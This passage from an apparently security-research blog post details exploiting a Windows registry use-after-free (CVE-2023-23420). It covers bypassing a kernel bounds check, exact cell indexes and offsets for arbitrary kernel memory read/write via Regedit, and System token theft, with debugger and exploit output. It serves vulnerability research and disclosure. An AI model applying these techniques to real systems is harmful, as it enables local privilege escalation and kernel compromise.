    BinAddress = ffff82828fc1a000, BlockOffset = 0000000000000000

    BlockAddress = ffff82828fc1a000 

    pcell:  ffff82828fc1a004

    Indeed, the _CMHIVE address passed as the input of the command was also printed in its output, which means that our technique works (the extra 0x4 in the output address is there to account for the cell size). If we were to insert this index into the _CM_KEY_VALUE.Data field, we would gain the ability to read from and write to the _CMHIVE structure in kernel memory through the registry value. This represents a very powerful capability in the hands of a local attacker.

    Writing the exploit

    At this stage, we already have a solid plan for how to leverage the initial primitive of hive memory corruption for further privilege escalation. It's time to choose a specific vulnerability and begin writing an actual exploit for it. This process is described in detail below.

    Step 0: Choosing the vulnerability

    Faced with approximately 17 vulnerabilities related to hive memory corruption, the immediate challenge is selecting one for a demonstration exploit. While any of these bugs could eventually be exploited with time and experimentation, they vary in difficulty. There is also an aesthetic consideration: for demonstration purposes, it would be ideal if the exploit's actions were visible within Regedit, which narrows our options. Nevertheless, with a significant selection still available, we should be able to identify a suitable candidate. Let's briefly examine two distinct possibilities.

    CVE-2022-34707

    The first vulnerability that always comes to my mind in the context of the registry is CVE-2022-34707. This is partly because it was the first bug I manually discovered as part of this research, but mainly because it is incredibly convenient to exploit. The essence of this bug is that it was possible to load a hive with a security descriptor containing a refcount very close to the maximum 32-bit value (e.g., 0xFFFFFFFF), and then overflow it by creating a few more keys that used it. This resulted in a very powerful UAF primitive, as the incorrectly freed cell could be subsequently filled with new objects and then freed again any number of times. In this way, it was possible to achieve type confusion of several different types of objects, e.g., by reusing the same cell subsequently as a security descriptor → value node → value data backing cell, we could easily gain control over the _CM_KEY_VALUE structure, allowing us to continue the attack using out-of-bounds cell indexes.

    Due to its characteristics, this bug was also the first vulnerability in this research for which I wrote a full-fledged exploit. Many of the techniques I describe here were discovered while working on this bug. Furthermore, the screenshot showing the privilege escalation at the end of blog post #1 illustrates the successful exploitation of CVE-2022-34707. However, in the context of this blog post, it has one fundamental flaw: to set the initial refcount to a value close to overflowing the 32-bit range, it is necessary to manually craft the input regf file. This means that the target can only be an app hive, and thus we wouldn't be able to directly observe the exploitation in the Registry Editor. This would greatly reduce my ability to visually demonstrate the exploit, which is what ultimately led me to look for a better bug.

    CVE-2023-23420

    This brings us to the second vulnerability, CVE-2023-23420. This is also a UAF condition within the hive, but it concerns a key node cell instead of a security descriptor cell. It was caused by certain issues in the transactional key rename operation. These problems were so deep and affected such fundamental aspects of the registry that this and the related vulnerabilities CVE-2023-23421, CVE-2023-23422 and CVE-2023-23423 were fixed by completely removing support for transacted key rename operations.

    In terms of exploitation, this bug is particularly unique because it can be triggered using only API/system calls, making it possible to corrupt any hive the attacker has write access to. This makes it an ideal candidate for writing an exploit whose operation is visible to the naked eye using standard Windows registry utilities, so that's what we'll do. Although the details of massaging the hive layout into the desired state may be slightly more difficult here than with CVE-2022-34707, it's nothing we can't handle. So let's get to work!

    Step 1: Abusing the UAF to establish dynamically-controlled value cells

    Let's start by clarifying that our attack will target the HKCU hive, and more specifically its volatile storage space. This will hopefully make the exploit a bit more reliable, as the volatile space resets each time the hive is reloaded, and there generally isn't much activity occurring there. The exploitation process begins with a key node use-after-free, and our goal is to take full control over the _CM_KEY_VALUE representation of two registry values by the end of the first stage (why two – we'll get to that in a moment). Once we achieve this goal, we will be able to arbitrarily set the _CM_KEY_VALUE.Data field, and thus gain read/write access to any chosen out-of-bounds cell index. There are many different approaches to how to achieve this, but in my proof-of-concept, I started with the following data layout:

    At the top left, a box labeled "Exploit" is designated as a "Key node," with a dotted line extending upwards from its "Key node" label. An arrow from "Exploit" points to a box labeled "TmpKeyName," also designated as a "Key node." From "TmpKeyName," two arrows point downwards to two separate "Key node" boxes: "SubKey1" and "SubKey2." Another arrow extends to the right from "TmpKeyName" to a vertically stacked group of four rectangular elements, collectively referred to as a "Value list" via a label to their left. From this "Value list," four separate arrows point to the right, each connecting to a distinct container box. Each of these container boxes has a "Value node" label above it: The first container is "FakeKeyContainer." The second is "ValueListContainer." The third is "KernelAddrContainer." The fourth is "KernelDataContainer."

    At the top of the hierarchy is the HKCU\Exploit key, which is the root of the entire exploit subtree. Its only role is to work as a container for all the other keys and values we create. Below it, we have the "TmpKeyName" key, which is important for two reasons: first, it stores four values that will be used at a later stage to fill freed cells with controlled data (but are currently empty). Second, this is the key on which we will perform the "rename" operation, which is the basis of the CVE-2023-23420 vulnerability. Below it are two more keys, "SubKey1" and "SubKey2", which are also needed in the exploitation process for transactional deletion, each through a different view of their parent.

    Once we have this data layout arranged in the hive, we can proceed to trigger the memory corruption. We can do it exactly as described in the original report in section "Operating on subkeys of transactionally renamed keys", and demonstrated in the corresponding InconsistentSubkeyList.cpp source code. In short, it involves the following steps:

    1. Creating a lightweight transaction by calling the NtCreateRegistryTransaction syscall.
    2. Opening two different handles to the HKCU\Exploit\TmpKeyName key within our newly created transaction.
    3. Performing a transactional rename operation on one of these handles, changing the name to "Scratchpad".
    4. Transactionally deleting the "SubKey1" and "SubKey2" keys, each through a different parent handle (one renamed, the other not).
    5. Committing the entire transaction by calling the NtCommitRegistryTransaction syscall.

    After successfully executing these operations on a vulnerable system, the layout of our objects within the hive should change accordingly:

    At the top left, a box labeled "Exploit" is designated as a "Key node," with a dotted line extending upwards from its "Key node" label. An arrow from "Exploit" points to a box labeled "Scratchpad," also designated as a "Key node." From "Scratchpad," a red arrow points downwards to a dashed-outline box labeled "Free." Another arrow extends to the right from "Scratchpad" to a vertically stacked group of four rectangular elements, collectively referred to as a "Value list" via a label to their left. From this "Value list," four separate arrows point to the right, each connecting to a distinct container box. Each of these container boxes has a "Value node" label above it: The first container is "FakeKeyContainer." The second is "ValueListContainer." The third is "KernelAddrContainer." The fourth is "KernelDataContainer."

    We see that the "TmpKeyName" key has been renamed to "Scratchpad", and both its subkeys have been released, but the freed cell of the second subkey still appears on its parent's subkey list. At this point, we want to use the four values of the "Scratchpad" key to create our own fake data structure. According to it, the freed subkey will still appear as existing, and contain two values named "KernelAddr" and "KernelData". Each of the "Container" values is responsible for imitating one type of object, and the most crucial role is played by the "FakeKeyContainer" value. Its backing buffer must perfectly align with the memory previously associated with the "SubKey1" key node. The diagram below illustrates the desired outcome:

    A diagram illustrates a complex data structure and flow, likely related to a system exploit. At the top left, a box labeled "Exploit," designated as a "Key node" with a dotted line extending upwards, points to a box labeled "Scratchpad," also a "Key node." "Scratchpad" points to the right to a vertically stacked group of four rectangular elements, labeled "Value list." This "Value list" has four arrows pointing to four "Value node" container boxes on the far right: "FakeKeyContainer," "ValueListContainer," "KernelAddrContainer," and "KernelDataContainer." An arrow extends downwards and to the right from "Scratchpad" to a box labeled "FakeKey," which is also designated as "Data cell / fake key node." From "FakeKey," an arrow points right to a stack of two horizontal elements labeled "Data cell / fake value list," and another thin arrow points upwards and right to "FakeKeyContainer." From the "Data cell / fake value list," its top element has an arrow pointing right to "KernelAddr" (labeled "Data cell / fake value node"), and its bottom element has an arrow pointing downwards and right to "KernelData" (labeled "Data cell / fake value node"). "KernelAddr" has a thin arrow pointing upwards and right to "KernelAddrContainer." "KernelData" has a thin arrow pointing upwards and right to "KernelDataContainer." A wavy line connects the right side of "KernelAddrContainer" to the left side of "KernelDataContainer," and another wavy line extends from the right side of "KernelDataContainer" off to the right.

    All the highlighted cells contain attacker-controlled data, which represent valid regf structures describing the HKCU\Exploit\Scratchpad\FakeKey key and its two values. Once this data layout is achieved, it becomes possible to open a handle to the "FakeKey" using standard APIs such as RegOpenKeyEx, and then operate on arbitrary cell indexes through its values. In reality, the process of crafting these objects after triggering the UAF is slightly more complicated than just setting data for four different values and requires the following steps:

    1. Writing to the "FakeKeyContainer" value with an initial, basic representation of the "FakeKey" key. At this stage, it is not important that the key node is entirely correct, but it must be of the appropriate length, and thus precisely cover the freed cell currently pointed to by the subkey list of the "Scratchpad" key.
    2. Setting the data for the other three container values – again, not the final ones yet, but those that have the appropriate length and are filled with unique markers, so that they can be easily recognized later on.
    3. Launching an info-leak loop to find the three cell indexes corresponding to the data cells of the "ValueListContainer", "KernelAddrContainer" and "KernelDataContainer" values, as well as a cell index of a valid security descriptor. This logic relies on abusing the _CM_KEY_NODE.Class and _CM_KEY_NODE.ClassLength fields of the "FakeKey" to point them to the data in the hive that we want to read. Specifically, the ClassLength member is set to 0xFFC, and the Class member is set to indexes 0x80000000, 0x80001000, 0x80002000, ... in subsequent loop iterations. This enables a kind of "arbitrary hive read" primitive, and the reading can be achieved by calling the NtEnumerateKey syscall on the "Scratchpad" key with the KeyNodeInformation class, which returns, among other things, the class property for a given subkey. This way, we get all the information about the internal hive layout needed to construct the final form of each of the imitated cells.
    4. Using the above information to set the correct data for each of the four cells: the key node of the "FakeKey" key with a valid security descriptor and index to the value list, the value list itself, and the value nodes of "KernelAddr" and "KernelData". This makes "FakeKey" a full-fledged key as seen by Windows, but with all of its internal regf structures fully controlled by us.

    If all of these steps are successful, we should be able to open the HKCU\Exploit\Scratchpad key in Regedit and see the current exploitation progress. An example from my test system is shown in the screenshot below. The extra "Filler" value is used to fill the space occupied by the old "TmpKeyName" key node freed during the rename operation. This is necessary so that the data of the "FakeKeyContainer" value correctly aligns with the freed cell of the "SubKey1" key, but I skipped this minor implementation detail in the above high-level description of the logic for the sake of clarity.

    Example successful exploit

    Step 2: Getting read/write access to the CMHIVE kernel object

    Since we now have full control over some registry values, the next logical step would be to initialize them with a specially crafted OOB cell index and then check if we can actually access the kernel structure it represents. Let's say that we set the type of the "KernelData" value to REG_BINARY, its length to 0x100, and the data cell index to the previously calculated value of 0xB2603000, which should point back at the hive's _CMHIVE structure on the kernel pool. If we do this, and then browse to the "FakeKey" key in the Registry Editor, we will encounter an unpleasant surprise:

    Bluescreen!

    This is definitely not the result we expected, and something must have gone wrong. If we investigate the system crash in WinDbg, we will get the following information:

    Break instruction exception - code 80000003 (first chance)

    A fatal system error has occurred.

    Debugger entered on first try; Bugcheck callbacks have not been invoked.

    A fatal system error has occurred.

    nt!DbgBreakPointWithStatus:

    fffff800`8061ff20 cc              int     3

    0: kd> !analyze -v

    *******************************************************************************

    *                                                                             *

    *                        Bugcheck Analysis                                    *

    *                                                                             *

    *******************************************************************************

    REGISTRY_ERROR (51)

    Something has gone badly wrong with the registry.  If a kernel debugger

    is available, get a stack trace. It can also indicate that the registry got

    an I/O error while trying to read one of its files, so it can be caused by

    hardware problems or filesystem corruption.

    It may occur due to a failure in a refresh operation, which is used only

    in by the security system, and then only when resource limits are encountered.

    Arguments:

    Arg1: 0000000000000001, (reserved)

    Arg2: ffffd4855dc36000, (reserved)

    Arg3: 00000000b2603000, depends on where Windows BugChecked, may be pointer to hive

    Arg4: 000000000000025d, depends on where Windows BugChecked, may be return code of

            HvCheckHive if the hive is corrupt.

    [...]

    0: kd> k

     # Child-SP          RetAddr               Call Site

    00 ffff828b`b100be68 fffff800`80763642     nt!DbgBreakPointWithStatus

    01 ffff828b`b100be70 fffff800`80762e81     nt!KiBugCheckDebugBreak+0x12

    02 ffff828b`b100bed0 fffff800`80617957     nt!KeBugCheck2+0xa71

    03 ffff828b`b100c640 fffff800`80a874d5     nt!KeBugCheckEx+0x107

    04 ffff828b`b100c680 fffff800`8089dfd5     nt!HvpReleaseCellPaged+0x1ec1a5

    05 ffff828b`b100c6c0 fffff800`808a29be     nt!CmpQueryKeyValueData+0x1a5

    06 ffff828b`b100c770 fffff800`808a264e     nt!CmEnumerateValueKey+0x13e

    07 ffff828b`b100c840 fffff800`80629e75     nt!NtEnumerateValueKey+0x31e

    08 ffff828b`b100ca70 00007ff8`242c4114     nt!KiSystemServiceCopyEnd+0x25

    09 00000008`c747dc38 00000000`00000000     0x00007ff8`242c4114

    We are seeing bugcheck code 0x51 (REGISTRY_ERROR), which indicates that it was triggered intentionally rather than through a bad memory access. Additionally, the direct caller of KeBugCheckEx is HvpReleaseCellPaged, a function that we haven't really mentioned so far in this blog post series.

    To better understand what is actually happening here, we need to take a step back and look at the general scheme of cell operations as implemented in the Windows kernel. It typically follows a common pattern:

      _HV_GET_CELL_CONTEXT Context;

      //

      // Translate the cell index to virtual address

      //

      PVOID CellAddress = Hive->GetCellRoutine(Hive, CellIndex, &Context);

      //

      // Operate on the cell view using the CellAddress pointer

      //

      ...

      //

      // Release the cell

      //

      Hive->ReleaseCellRoutine(Hive, &Context)

    There are three stages here: translating the cell index to a virtual address, performing operations on that cell, and releasing it. We are already familiar with the first two, and they are both obvious, but what is the release about? Based on a historical analysis of various Windows kernel builds, it turns out that in some versions, a get+release function pair was not only used for translating cell indexes to virtual addresses, but also to ensure that the memory view of the cell would not be accidentally unmapped between these two calls.

    The presence or absence of the "release" function in consecutive Windows versions is shown below:

    • Windows NT 3.1 – 2000: ❌
    • Windows XP – 7: ✅
    • Windows 8 – 8.1: ❌
    • Windows 10 – 11: ✅

    Let's take a look at the decompiled HvpReleaseCellPaged function from Windows 10, 1507 (build 10240), where it first reappeared after a hiatus in Windows 8.x:

    VOID HvpReleaseCellPaged(_CMHIVE *CmHive, _HV_GET_CELL_CONTEXT *Context) {

      _HCELL_INDEX RealCell;

      _HMAP_ENTRY *MapEntry;

      RealCell = Context->Cell & 0xFFFFFFFE;

      MapEntry = HvpGetCellMap(&CmHive->Hive, RealCell);

      if (MapEntry == NULL) {

        KeBugCheckEx(REGISTRY_ERROR, 1, CmHive, RealCell, 0x291);

      }

      if ((Context->Cell & 1) != 0) {

        HvpMapEntryReleaseBinAddress(MapEntry);

      }

      HvpGetCellContextReinitialize(Context);

    }

    _HMAP_ENTRY *HvpGetCellMap(_HHIVE *Hive, _HCELL_INDEX CellIndex) {

      DWORD StorageType = CellIndex >> 31;

      DWORD StorageIndex = CellIndex & 0x7FFFFFFF;

      if (StorageIndex < Hive->Storage[StorageType].Length) {

        return &Hive->Storage[StorageType].Map

                                         ->Directory[(CellIndex >> 21) & 0x3FF]

                                         ->Table[(CellIndex >> 12) & 0x1FF];

      } else {

        return NULL;

      }

    }

    VOID HvpMapEntryReleaseBinAddress(_HMAP_ENTRY *MapEntry) {

      ExReleaseRundownProtection(&MapEntry->TemporaryBinRundown);

    }

    VOID HvpGetCellContextReinitialize(_HV_GET_CELL_CONTEXT *Context) {

      Context->Cell = -1;

      Context->Hive = NULL;

    }

    As we can see, the main task of HvpReleaseCellPaged and its helper functions was to find the _HMAP_ENTRY structure that corresponded to a given cell index, and then potentially call the ExReleaseRundownProtection API on the _HMAP_ENTRY.TemporaryBinRunDown field. This behavior was coordinated with the implementation of HvpGetCellPaged, which called ExAcquireRundownProtection on the same object. An additional side effect was that during the lookup of the _HMAP_ENTRY structure, a bounds check was performed on the cell index, and if it failed, a REGISTRY_ERROR bugcheck was triggered.

    This state of affairs persisted for about two years, until Windows 10 1803 (build 17134). In that version, the code was greatly simplified: the TemporaryBinAddress and TemporaryBinRundown members were removed from _HMAP_ENTRY, and the call to ExReleaseRundownProtection was eliminated from HvpReleaseCellPaged. This effectively meant that there was no longer any reason for this function to retrieve a pointer to the map entry (as it was not used for anything), but for some unclear reason, this logic has remained in the code to this day. In most modern kernel builds, the auxiliary functions have been inlined, and HvpReleaseCellPaged now takes the following form:

    VOID HvpReleaseCellPaged(_HHIVE *Hive, _HV_GET_CELL_CONTEXT *Context) {

      _HCELL_INDEX Cell = Context->Cell;

      DWORD StorageIndex = Cell & 0x7FFFFFFF;

      DWORD StorageType = Cell >> 31;

      if (StorageIndex >= Hive->Storage[StorageType].Length ||

          &Hive->Storage[StorageType].Map->Directory[(Cell >> 21) & 0x3FF]->Table[(Cell >> 12) & 0x1FF] == NULL) {

        KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267);

      }

      Context->Cell = -1;

      Context->BinContext = 0;

    }

    The bounds check on the cell index is clearly still present, but it doesn't serve any real purpose. Based on this, we can assume that this is more likely a historical relic rather than a mitigation deliberately added by the developers. Still, it interferes with our carefully crafted exploitation technique. Does this mean that OOB cell indexes are not viable because their use will always result in a forced BSoD, and we have to look for other privilege escalation methods instead?

    As it turns out, not necessarily. Indeed, if the bounds check was located in the HvpGetCellPaged function, there wouldn't be much to discuss – a blue screen would always occur right before using any OOB index, completely neutralizing this idea's usefulness. However, as things stand, resolving such an index works without issues, and we can perform a single invalid memory operation before a crash occurs in the release call. In many ways, this sounds like a "pwn" task straight out of a CTF, where the attacker is given a memory corruption primitive that is theoretically exploitable, but somehow artificially limited, and the goal is to figure out how to cleverly bypass this limitation. Let's take another look at the if statement that stands in our way:

    if (StorageIndex >= Hive->Storage[StorageType].Length || /* ... */) {

      KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267);

    }

    The index is compared against the value of the long-lived _HHIVE.Storage[StorageType].Length field, which is located at a constant offset from the beginning of the _HHIVE structure. On the Windows 11 system I tested, this offset is 0x118 for stable storage and 0x390 for volatile storage:

    0: kd> dx (&((_HHIVE*)0)->Storage[0].Length)

    (&((_HHIVE*)0)->Storage[0].Length)                 : 0x118

    0: kd> dx (&((_HHIVE*)0)->Storage[1].Length)

    (&((_HHIVE*)0)->Storage[1].Length)                 : 0x390

    As we established earlier, the special out-of-bounds index 0xB2603000 points to the base address of the _CMHIVE / _HHIVE structure. By adding one of the offsets above, we can obtain an index that points directly to the Length field. Let's test this in practice:

    0: kd> dx (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length) 

    (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)                  : 0xffff810713f82390

    0: kd> !reg cellindex 0xffff810713f82000 0xB2603390-4

    Map = ffff810713f823a0 Type = 1 Table = 193 Block = 3 Offset = 38c

    MapTable     = ffff810713debe90 

    MapEntry     = ffff810713debed8 

    BinAddress = ffff810713f82000, BlockOffset = 0000000000000000

    BlockAddress = ffff810713f82000 

    pcell:  ffff810713f82390

    So, indeed, index 0xB260338C points to the field representing the length of the volatile space in the HKCU hive. This is very good news for an attacker, because it means that they are able to neutralize the bounds check in HvpReleaseCellPaged by performing the following steps:

    1. Crafting a controlled registry value with a data index of 0xB260338C.
    2. Setting this value programmatically to a very large number, such as 0xFFFFFFFF, and thus overwriting the _HHIVE.Storage[1].Length field with it.
    3. During the NtSetValueKey syscall in step 2, when HvpReleaseCellPaged is called on index 0xB260338C, the Length member has already been corrupted. As a result, the condition checked by the function is not satisfied, and the KeBugCheckEx call never occurs.
    4. Since the _HHIVE.Storage[1].Length field is located in a global hive object and does not change very often (unless the storage space is expanded or shrunk), all future checks performed in HvpReleaseCellPaged against this hive will no longer pose any risk to the exploit stability.

    To better realize just how close the overwriting of the Length field is to its use in the bounds check, we can have a look at the disassembly of the CmpSetValueKeyExisting function, where this whole logic takes place.

    Dissasembly output

    The technique works by a hair's breadth – the memmove and HvpReleaseCellPaged calls are separated by only a few instructions. Nevertheless, it works, and if we first perform a write to the 0xB260338C index (or equivalent) after gaining binary control over the hive, then we will be subsequently able to read from/write to any OOB indexes without any restrictions in the future.

    For completeness, I should mention that after corrupting the Length field, it is worthwhile to set a few additional flags in the _HHIVE.HiveFlags field using the same trick as before. This prevents the kernel from crashing due to the unexpectedly large hive length. Specifically, the flags are (as named in blog post #6):

    • HIVE_COMPLETE_UNLOAD_STARTED (0x40): This prevents a crash during potential hive unloading in the CmpLateUnloadHiveWorker → CmpCompleteUnloadKey → HvHiveCleanup → HvpFreeMap → CmpFree function.
    • HIVE_FILE_READ_ONLY (0x8000): This prevents a crash that could occur in the CmpFlushHive → HvStoreModifiedData → HvpTruncateBins path.

    Of course, these are just conclusions drawn from writing a demonstration exploit, so I don't guarantee that the above flags are sufficient to maintain system stability in every configuration. Nevertheless, repeated tests have shown that it works in my environment, and if we subsequently set the data cell index of the controlled value back to 0xB2603000, and the Type/DataLength fields to something like REG_BINARY and 0x100, we should be finally able to see the following result in the Registry Editor:

    Result in registry editor

    It is easy to verify that this is indeed a "live view" into the _CMHIVE structure in kernel memory:

    0: kd> dt _HHIVE ffff810713f82000

    nt!_HHIVE

       +0x000 Signature        : 0xbee0bee0

       +0x008 GetCellRoutine   : 0xfffff801`8049b370     _CELL_DATA*  nt!HvpGetCellPaged+0

       +0x010 ReleaseCellRoutine : 0xfffff801`8049b330     void  nt!HvpReleaseCellPaged+0

       +0x018 Allocate         : 0xfffff801`804cae30     void*  nt!CmpAllocate+0

       +0x020 Free             : 0xfffff801`804c9100     void  nt!CmpFree+0

       +0x028 FileWrite        : 0xfffff801`80595e00     long  nt!CmpFileWrite+0

       +0x030 FileRead         : 0xfffff801`805336a0     long  nt!CmpFileRead+0

       +0x038 HiveLoadFailure  : (null)

       +0x040 BaseBlock        : 0xffff8107`13f9a000 _HBASE_BLOCK

    [...]

    Unfortunately, the hive signature 0xBEE0BEE0 is not visible in the screenshot, because the first four bytes of the cell are treated as its size, and only the subsequent bytes as actual data. For this reason, the entire view of the structure is shifted by 4 bytes. Nevertheless, it is immediately apparent that we have gained direct access to function addresses within the kernel image, as well as many other interesting pointers and data. We are getting very close to our goal!

    Step 3: Getting arbitrary read/write access to the entire kernel address space

    At this point, we can both read from and write to the _CMHIVE structure through our magic value, and also operate on any other out-of-bounds cell index that resolves to a valid address. This means that we no longer need to worry about kernel ASLR, as _CMHIVE readily leaks the base address of ntoskrnl.exe, as well as many other addresses from kernel pools. The question now is how, with these capabilities, to execute our own payload in kernel-mode or otherwise elevate our process's privileges in the system. What may immediately come to mind based on the layout of the _CMHIVE / _HHIVE structure is the idea of overwriting one of the function pointers located at the beginning. In practice, this is less useful than it seems. As I wrote in blog post #6, the vast majority of operations on these pointers have been devirtualized, and in the few cases where they are still used directly, the Control Flow Guard mitigation is enabled. Perhaps something could be ultimately worked out to bypass CFG, but with the primitives currently available to us, I decided that this sounds more difficult than it should be.

    If not that, then what else? Experienced exploit developers would surely find dozens of different ways to complete the privilege escalation process. However, I had a specific goal in mind that I wanted to achieve from the start. I thought it would be elegant to create an arrangement of objects where the final stage of exploitation could be performed interactively from within Regedit. This brings us back to the selection of our two fake values, "KernelAddr" and "KernelData". My goal with these values was to be able to enter any kernel address into KernelAddr, and have KernelData automatically—based solely on how the registry works—contain the data from that address, available for both reading and writing. This would enable a very unique situation where the user could view and modify kernel memory within the graphical interface of a tool available in a default Windows installation—something that doesn't happen very often. 🙂

    The crucial observation that allows us to even consider such a setup is the versatility of the cell maps mechanism. In order for such an obscure arrangement to work, KernelData must utilize a _HMAP_ENTRY structure controlled by KernelAddr at the final stage of the cell walk. Referring back to the previous diagram illustrating the relationships between the _CMHIVE structure and other objects, this implies that if KernelAddr reaches an object through two pointer dereferences, KernelData must be configured to reach it with a single dereference, so that the second dereference then occurs through the data stored in KernelAddr.

    In practice, this can be achieved as follows: KernelAddr will function similarly as before, pointing to an offset within _CMHIVE using a series of pointer dereferences:

    • _CMHIVE.CmRm → _CM_RM.Hive → _CMHIVE: for normal hives (e.g., HKCU).
    • _CMHIVE.RootKcb → _CM_KEY_CONTROL_BLOCK.KeyHive → _CMHIVE: for app hives.

    For KernelData, we can use any self-referencing pointer in the first step of the cell walk. These are plentiful in _CMHIVE, due to the fact that there are many LIST_ENTRY objects initialized as an empty list.

    The next step is to select the appropriate offsets and indexes based on the layout of the _CMHIVE structure, so that everything aligns with our plan. Starting with KernelAddr, the highest 20 bits of the cell index remain the same as before, which is 0xB2603???. The lower 12 bits will correspond to an offset within _CMHIVE where we will place our fake _HMAP_ENTRY object. This should be a 0x18 byte area that is generally unused and located after a self-referencing pointer. For demonstration purposes, I used offset 0xB70, which corresponds to the following fields:

    _CMHIVE layout

    _HMAP_ENTRY layout

    +0xb70 UnloadEventArray : Ptr64 Ptr64 _KEVENT

    +0x000 BlockOffset         : Uint8B

    +0xb78 RootKcb          : Ptr64 _CM_KEY_CONTROL_BLOCK

    +0x008 PermanentBinAddress : Uint8B

    +0xb80 Frozen           : UChar

    +0x010 MemAlloc            : Uint4B

    On my test Windows 11 system, all these fields are zeroed out and unused for the HKCU hive, which makes them well-suited for acting as the _HMAP_ENTRY structure. The final cell index for the KernelAddr value will, therefore, be 0xB2603000 + 0xB70 - 0x4 = 0xB2603B6C. If we set its type to REG_QWORD and its length to 8 bytes, then each write to it will result in setting the _CMHIVE.UnloadEventArray field (or _HMAP_ENTRY.BlockOffset in the context of the cell walk) to the specified 64-bit number.

    As for KernelData, we will use _CMHIVE.SecurityHash[3].Flink, located at offset 0x798, as the aforementioned self-referencing pointer. To calculate the directory index value, we need to subtract it from the offset of _CMHIVE.Hive.Storage[1].SmallDir and then divide by 8, which gives us: (0x798 - 0x3A0) ÷ 8 = 0x7F. Next, we will calculate the table index by subtracting the offset of the fake _HMAP_ENTRY structure from the offset of the self-referencing pointer and then dividing the result by the size of _HMAP_ENTRY: (0xB70 - 0x798) ÷ 0x18 = 0x29. If we assume that the 12-bit offset part is zero (we don't want to add any offsets at this point), then we have all the elements needed to compose the full cell index. We will use the MakeCellIndex helper function defined earlier for this purpose:

    >>> MakeCellIndex(1, 0x7F, 0x29, 0)

    0x8fe29000

    So, the cell index for the KernelData value will be 0x8FE29000, and with that, we have all the puzzle pieces needed to assemble our intricate construction. This is illustrated in the diagram below:

    Diagram described below

    The cell map walk for the KernelAddr value is shown on the right side of the _CMHIVE structure, and the cell map walk for KernelData is on the left. The dashed arrows marked with numbers ①, ②, and ③ correspond to the consecutive elements of the cell index (i.e., directory index, table index, and offset), while the solid arrows represent dereferences of individual pointers. As you can see, we successfully managed to select indexes where the data of one value directly influences the target virtual address to which the other one is resolved.

    We could end this section right here, but there is one more minor issue I'd like to mention. As you may recall, the HvpGetCellPaged function ends with the following statement:

    return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4;

    Our current assumption is that the PermanentBinAddress and the lower 12 bits of the index are both zero, and BlockOffset contains the exact value of the address we want to access. Unfortunately, the expression ends with the extra "+4". Normally, this skips the cell size and directly returns a pointer to the cell's data, but in our exploit, it means we would see a view of the kernel memory shifted by four bytes. This isn't a huge issue in practical terms, but it doesn't look perfect in a demonstration.

    So, can we do anything about this? It turns out, we can. What we want to achieve is to subtract 4 from the final result using the other controlled addends in the expression (PermanentBinAddress and BlockOffset). Individually, each of them has some limitations:

    • The PermanentBinAddress is a fully controlled 64-bit field, but only its upper 60 bits are used when constructing the cell address. This means we can only use it to subtract multiples of 0x10, but not exactly 4.
    • The cell offset is a 12-bit unsigned number, so we can use it to add any number in the 1–4095 range, but we can't subtract anything.

    However, we can combine both of them together to achieve the desired goal. If we set PermanentBinAddress to 0xFFFFFFFFFFFFFFF0 (-0x10 in 64-bit representation) and the cell offset to 0xC, their sum will be -4, which will mutually reduce with the unconditionally added +4, causing the HvpGetCellPaged function to return exactly Entry->BlockOffset. For our exploit, this means one additional write to the _CMHIVE structure to properly initialize the fake PermanentBinAddress field, and a slight change in the cell index of the KernelData value from the previous 0x8FE29000 to 0x8FE2900C. If we perform all these steps correctly, we should be able to read and write arbitrary kernel memory via Regedit. For example, let's dump the data at the beginning of the ntoskrnl.exe kernel image using WinDbg:

    0: kd> ? nt

    Evaluate expression: -8781857554432 = fffff803`50800000

    0: kd> db /c8 fffff803`50800004

    fffff803`50800004  03 00 00 00 04 00 00 00  ........

    fffff803`5080000c  ff ff 00 00 b8 00 00 00  ........

    fffff803`50800014  00 00 00 00 40 00 00 00  ....@...

    fffff803`5080001c  00 00 00 00 00 00 00 00  ........

    fffff803`50800024  00 00 00 00 00 00 00 00  ........

    fffff803`5080002c  00 00 00 00 00 00 00 00  ........

    fffff803`50800034  00 00 00 00 00 00 00 00  ........

    fffff803`5080003c  10 01 00 00 0e 1f ba 0e  ........

    fffff803`50800044  00 b4 09 cd 21 b8 01 4c  ....!..L

    fffff803`5080004c  cd 21 54 68 69 73 20 70  .!This p

    fffff803`50800054  72 6f 67 72 61 6d 20 63  rogram c

    fffff803`5080005c  61 6e 6e 6f 74 20 62 65  annot be

    And then let's browse to the same address using our FakeKey in Regedit:

    Fake key in registry editor

    The data from both sources match, and the KernelData value displays them correctly without any additional offset. A keen observer will note that the expected "MZ" signature is not there, because I entered an address 4 bytes greater than the kernel image base. I did this because, even though we can "peek" at any virtual address X through the special registry value, the kernel still internally accesses address X-4 for certain implementation reasons. Since there isn't any data mapped directly before the ntoskrnl.exe image in memory, using the exact image base would result in a system crash while trying to read from the invalid address 0xFFFFF803507FFFFC.

    An even more attentive reader will also notice that the exploit has jokingly changed the window title from "Registry Editor" to "Kernel Memory Editor", as that's what the program has effectively become at this point. 🙂

    Step 4: Elevating process security token

    With an arbitrary kernel read/write primitive and the address of ntoskrnl.exe at our disposal, escalating privileges is a formality. The simplest approach is perhaps to iterate through the linked list of all processes (made of _EPROCESS structures) starting from nt!KiProcessListHead, find both the "System" process and our own process on the list, and then copy the security token from the former to the latter. This method is illustrated in the diagram below.

    Diagram described above

    This entire procedure could be easily performed programmatically, using only RegQueryValueEx and RegSetValueEx calls. However, it would be a shame not to take advantage of the fact that we can modify kernel memory through built-in Windows tools. Therefore, my exploit performs most of the necessary steps automatically, except for the final stage – overwriting the process security token. For that part, it creates a .reg file on disk that refers to our fake key and its two registry values. The first is KernelAddr, which points to the address of the security token within the _EPROCESS structure of a newly created command prompt, followed by KernelData, which contains the actual value of the System token. The invocation and output of the exploit looks as follows:

    C:\Users\user\Desktop\exploits>Exploit.exe C:\users\user\Desktop\become_admin.reg

    [+] Found kernel base address: fffff80350800000

    [+] Spawning a command prompt...

    [+] Found PID 6892 at address ffff8107b3864080

    [+] System process: ffff8107ad0ed040, security token: ffffc608b4c8a943

    [+] Exploit succeeded, enjoy!

    C:\Users\user\Desktop\exploits>

    Then, a new command prompt window appears on the screen. There, we can manually perform the final step of the attack, applying changes from the newly created become_admin.reg file using the reg.exe tool, thus overwriting the appropriate field in kernel memory and granting ourselves elevated privileges:

    It works!

